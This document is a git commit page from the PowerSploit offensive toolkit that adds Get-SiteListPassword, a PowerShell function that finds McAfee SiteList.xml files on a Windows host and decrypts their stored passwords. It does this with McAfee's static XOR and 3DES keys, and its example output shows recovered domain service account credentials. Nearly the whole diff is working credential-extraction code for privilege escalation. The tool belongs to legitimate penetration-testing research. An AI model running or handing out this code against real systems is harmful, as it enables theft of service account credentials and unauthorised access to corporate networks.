diff options
| author | Harmj0y <will@harmj0y.net> | 2016-02-11 21:42:20 -0500 |
|---|---|---|
| committer | Harmj0y <will@harmj0y.net> | 2016-02-11 21:42:20 -0500 |
| commit | 2e6b301170e67938e553e47e9f23353814ea2b3b (patch) | |
| tree | 7a82ed2714e436b985df4e6b02c8e52561b3620f /Privesc | |
| parent | aea2eacd2de516f889872703754404edeb90f644 (diff) | |
| download | PowerSploit-2e6b301170e67938e553e47e9f23353814ea2b3b.tar.gz PowerSploit-2e6b301170e67938e553e47e9f23353814ea2b3b.zip | |
Added Get-SiteListPassword to decrypt McAfee SiteList.xml file passwords.
Diffstat (limited to 'Privesc')
| -rw-r--r-- | Privesc/Get-SiteListPassword.ps1 | 201 | ||||
| -rw-r--r-- | Privesc/Privesc.psd1 | 3 |
2 files changed, 203 insertions, 1 deletions
diff --git a/Privesc/Get-SiteListPassword.ps1 b/Privesc/Get-SiteListPassword.ps1 new file mode 100644 index 0000000..7d5f679 --- /dev/null +++ b/Privesc/Get-SiteListPassword.ps1 @@ -0,0 +1,201 @@ +function Get-SiteListPassword { +<# + .SYNOPSIS + + Retrieves the plaintext passwords for found McAfee's SiteList.xml files. + Based on Jerome Nokin (@funoverip)'s Python solution (in links). + + PowerSploit Function: Get-SiteListPassword + Original Author: Jerome Nokin (@funoverip) + PowerShell Port: @harmj0y + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + + .PARAMETER SiteListFilePath + + Optional path to a SiteList.xml file. + + .EXAMPLE + + EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== + UserName : + Path : Products/CommonUpdater + Name : McAfeeHttp + DecPassword : MyStrongPassword! + Enabled : 1 + DomainName : + Server : update.nai.com:80 + + EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== + UserName : McAfeeService + Path : Repository$ + Name : Paris + DecPassword : MyStrongPassword! + Enabled : 1 + DomainName : companydomain + Server : paris001 + + EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== + UserName : McAfeeService + Path : Repository$ + Name : Tokyo + DecPassword : MyStrongPassword! + Enabled : 1 + DomainName : companydomain + Server : tokyo000 + + .LINK + https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ + https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ + https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +#> + + [CmdletBinding()] + param( + [ValidateScript({Test-Path -Path $_ })] + [String] + $SiteListFilePath + ) + + function Get-DecryptedSitelistPassword { + # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ + # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) + # port by @harmj0y + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True)] + [String] + $B64Pass + ) + + # make sure the appropriate assemblies are loaded + Add-Type -assembly System.Security + Add-Type -assembly System.Core + + # declare the encoding/crypto providers we need + $Encoding = [System.Text.Encoding]::ASCII + $SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider + $3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider + + # static McAfee key XOR key LOL + $XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19 + + # xor the input b64 string with the static XOR key + $I = 0; + $UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] } + + # build the static McAfee 3DES key TROLOL + $3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4 + + # set the options we need + $3DES.Mode = 'ECB' + $3DES.Padding = 'None' + $3DES.IV = ,0x00*8 + $3DES.Key = $3DESKey + + # decrypt the unXor'ed block + $Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length) + + # ignore the padding for the result + $Index = [Array]::IndexOf($Decrypted, [Byte]0) + if($Index -ne -1) { + $DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)]) + } + else { + $DecryptedPass = $Encoding.GetString($Decrypted) + } + + New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass} + } + + function Get-SitelistFields { + [CmdletBinding()] + Param ( + [Parameter(Mandatory = $True)] + [String] + $Path + ) + + try { + [Xml]$SiteListXml = Get-Content -Path $Path + + if($SiteListXml.InnerXml -Like "*password*") { + Write-Verbose "Potential password in found in $Path" + + $SiteListXml.SiteLists.SiteList.HttpSite | Foreach-Object { + $Name = $_.Name + $Enabled = $_.Enabled + $Server = $_.Server + $Path = $_.RelativePath + $UserName = $_.UserName + $PasswordRaw = $_.Password.'#Text' + + try { + $PasswordRaw = $_.Password.'#Text' + + # decrypt the base64 password + $DecPassword = Get-DecryptedSitelistPassword -B64Pass $PasswordRaw + + #Create custom object to output results + $ObjectProperties = @{ + 'Name' = $_.Name; + 'Enabled' = $_.Enabled; + 'Server' = $_.Server; + 'Path' = $_.RelativePath; + 'DomainName' = ''; + 'UserName' = $_.UserName; + 'EncPassword' = $PasswordRaw; + 'DecPassword' = $DecPassword.Decrypted; + } + New-Object -TypeName PSObject -Property $ObjectProperties + } + catch { + Write-Debug "Error parsing HttpSite : $_" + } + } + + $SiteListXml.SiteLists.SiteList.UNCSite | Foreach-Object { + try { + $PasswordRaw = $_.Password.'#Text' + + # decrypt the base64 password + $DecPassword = Get-DecryptedSitelistPassword -B64Pass $PasswordRaw + + #Create custom object to output results + $ObjectProperties = @{ + 'Name' = $_.Name; + 'Enabled' = $_.Enabled; + 'Server' = $_.Server; + 'Path' = $_.ShareName; + 'DomainName' = $_.DomainName; + 'UserName' = $_.UserName; + 'EncPassword' = $PasswordRaw; + 'DecPassword' = $DecPassword.Decrypted; + } + New-Object -TypeName PSObject -Property $ObjectProperties + } + catch { + Write-Debug "Error parsing UNCSite : $_" + } + } + } + } + catch { + Write-Error $Error[0] + } + } + + if($SiteListFilePath) { + $XmlFiles = Get-ChildItem -Path $SiteListFilePath + } + else { + $XmlFiles = Get-ChildItem -Recurse -Include 'SiteList.xml' -Path 'C:\Program Files\' -ErrorAction SilentlyContinue + $XmlFiles += Get-ChildItem -Recurse -Include 'SiteList.xml' -Path 'C:\Program Files (x86)\' -ErrorAction SilentlyContinue + } + + $XmlFiles | Where-Object { $_ } | Foreach-Object { + Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'" + Get-SitelistFields -Path $_.Fullname + } +} diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1 index 2ccdb8e..9777f2a 100644 --- a/Privesc/Privesc.psd1 +++ b/Privesc/Privesc.psd1 @@ -42,7 +42,8 @@ FunctionsToExport = @( 'Restore-ServiceBinary', 'Write-HijackDll', 'Write-ServiceBinary', - 'Write-UserAddMSI' + 'Write-UserAddMSI', + 'Get-SiteListPassword' ) # List of all files packaged with this module |